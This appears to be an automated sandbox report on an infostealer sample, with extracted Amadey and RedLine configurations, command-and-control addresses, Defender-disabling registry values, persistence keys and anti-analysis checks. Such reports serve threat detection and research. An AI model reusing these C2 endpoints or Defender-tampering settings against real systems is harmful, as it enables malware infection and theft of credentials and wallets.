Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
02/03/2023, 20:04
Behavioral task
behavioral1
Sample
0x00060000000130e0-1007.exe
Resource
win7-20230220-en
General
-
Target
0x00060000000130e0-1007.exe
-
Size
235KB
-
MD5
f6bb53738cf4603c7ce4aa8217857ae6
-
SHA1
5a001bb6e34b3360d7ecf911be560f872a3de20a
-
SHA256
e3ee5ab2a8a569a40facbe16cf960548fe70350fe8003c6c14b37255e5084239
-
SHA512
127b02f89f523a225e750093d9ef72f9b60c1d6e996d6b09104c7f9b0507d1c271ce780f8c43cdb8c6e2049bb663d7c5551ae9c95886de9a4a17d70b01c308c3
-
SSDEEP
6144:R/qDDbAZiwe41jLDzpZWS2ouViF3DIkJk:t7xjLLW+uViNI7
Malware Config
Extracted
amadey
3.68
193.233.20.26/Do3m4Gor/index.php
Extracted
redline
stek
melevv.eu:4162
-
auth_value
4205381daf6946b2df5fe3bc7eacc918
Extracted
redline
fomich
melevv.eu:4162
-
auth_value
b018e52ac946001794d8b8c23e901859
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" sw73gW47sM09.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" sw73gW47sM09.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" urID10QT33.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" urID10QT33.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" sw73gW47sM09.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" sw73gW47sM09.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection urID10QT33.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" urID10QT33.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" urID10QT33.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" urID10QT33.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection sw73gW47sM09.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" sw73gW47sM09.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 14 IoCs
resource yara_rule behavioral2/memory/4836-283-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-282-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-285-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-287-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-295-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-300-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-302-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-309-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-305-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-313-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-317-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-320-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-322-0x0000000007180000-0x00000000071BE000-memory.dmp family_redline behavioral2/memory/4836-794-0x0000000007270000-0x0000000007280000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MainV2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MainV2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ r.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ r.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MainV2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MainV2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MainV2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MainV2.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation 0x00060000000130e0-1007.exe Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation ghaaer.exe -
Executes dropped EXE 17 IoCs
pid Process 2084 ghaaer.exe 1420 serka.exe 2808 vfF6052rj.exe 3680 sw73gW47sM09.exe 4416 mohta.exe 4604 ycdC50dp58.exe 2600 urID10QT33.exe 4644 MainV2.exe 4836 trl39yt88.exe 1188 wrxQ93Sb35.exe 4888 MainV2.exe 2764 ghaaer.exe 3100 xuuv99RY34.exe 4444 uUN27JU66.exe 2408 m.exe 1468 r.exe 2852 r.exe -
Loads dropped DLL 1 IoCs
pid Process 2312 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000600000002316b-253.dat themida behavioral2/files/0x000600000002316b-263.dat themida behavioral2/files/0x000600000002316b-264.dat themida behavioral2/memory/4644-265-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/memory/4644-266-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/memory/4644-267-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/memory/4644-268-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/memory/4644-269-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/memory/4644-270-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/memory/4644-271-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/memory/4644-272-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/memory/4644-273-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/memory/4644-274-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/memory/4644-277-0x0000000000EE0000-0x00000000019C3000-memory.dmp themida behavioral2/files/0x000600000002316b-2180.dat themida behavioral2/files/0x0008000000023167-2261.dat themida behavioral2/files/0x0008000000023167-2262.dat themida behavioral2/files/0x0008000000023167-2290.dat themida behavioral2/files/0x0008000000023167-2317.dat themida behavioral2/files/0x0008000000023167-2345.dat themida behavioral2/files/0x0008000000023167-2368.dat themida -
resource yara_rule behavioral2/files/0x000700000002315d-2239.dat vmprotect behavioral2/files/0x000700000002315d-2240.dat vmprotect -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" sw73gW47sM09.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features urID10QT33.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" urID10QT33.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce serka.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce vfF6052rj.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce mohta.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" mohta.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce ycdC50dp58.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" serka.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" vfF6052rj.exe Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\serka.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000001051\\serka.exe" ghaaer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" ycdC50dp58.exe Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mohta.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000002051\\mohta.exe" ghaaer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MainV2.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MainV2.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA r.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA r.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\m.exe MainV2.exe File created C:\Windows\system32\r.exe MainV2.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4644 MainV2.exe 4888 MainV2.exe 1468 r.exe 2852 r.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 456 sc.exe 1344 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 4244 2600 WerFault.exe 99 2612 1188 WerFault.exe 107 2332 4836 WerFault.exe 101 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 652 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates MainV2.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MainV2.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 MainV2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 MainV2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 MainV2.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3680 sw73gW47sM09.exe 3680 sw73gW47sM09.exe 2600 urID10QT33.exe 2600 urID10QT33.exe 4644 MainV2.exe 5108 powershell.exe 5108 powershell.exe 2708 powershell.exe 2708 powershell.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 1188 wrxQ93Sb35.exe 1188 wrxQ93Sb35.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4836 trl39yt88.exe 4836 trl39yt88.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe 4888 MainV2.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 672 Process not Found -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 3680 sw73gW47sM09.exe Token: SeDebugPrivilege 2600 urID10QT33.exe Token: SeDebugPrivilege 4644 MainV2.exe Token: SeDebugPrivilege 4836 trl39yt88.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeIncreaseQuotaPrivilege 5108 powershell.exe Token: SeSecurityPrivilege 5108 powershell.exe Token: SeTakeOwnershipPrivilege 5108 powershell.exe Token: SeLoadDriverPrivilege 5108 powershell.exe Token: SeSystemProfilePrivilege 5108 powershell.exe Token: SeSystemtimePrivilege 5108 powershell.exe Token: SeProfSingleProcessPrivilege 5108 powershell.exe Token: SeIncBasePriorityPrivilege 5108 powershell.exe Token: SeCreatePagefilePrivilege 5108 powershell.exe Token: SeBackupPrivilege 5108 powershell.exe Token: SeRestorePrivilege 5108 powershell.exe Token: SeShutdownPrivilege 5108 powershell.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeSystemEnvironmentPrivilege 5108 powershell.exe Token: SeRemoteShutdownPrivilege 5108 powershell.exe Token: SeUndockPrivilege 5108 powershell.exe Token: SeManageVolumePrivilege 5108 powershell.exe Token: 33 5108 powershell.exe Token: 34 5108 powershell.exe Token: 35 5108 powershell.exe Token: 36 5108 powershell.exe Token: SeDebugPrivilege 1188 wrxQ93Sb35.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 4888 MainV2.exe Token: SeDebugPrivilege 3100 xuuv99RY34.exe Token: SeDebugPrivilege 4444 uUN27JU66.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeDebugPrivilege 3924 powershell.exe Token: SeLockMemoryPrivilege 2408 m.exe Token: SeDebugPrivilege 3756 powershell.exe -
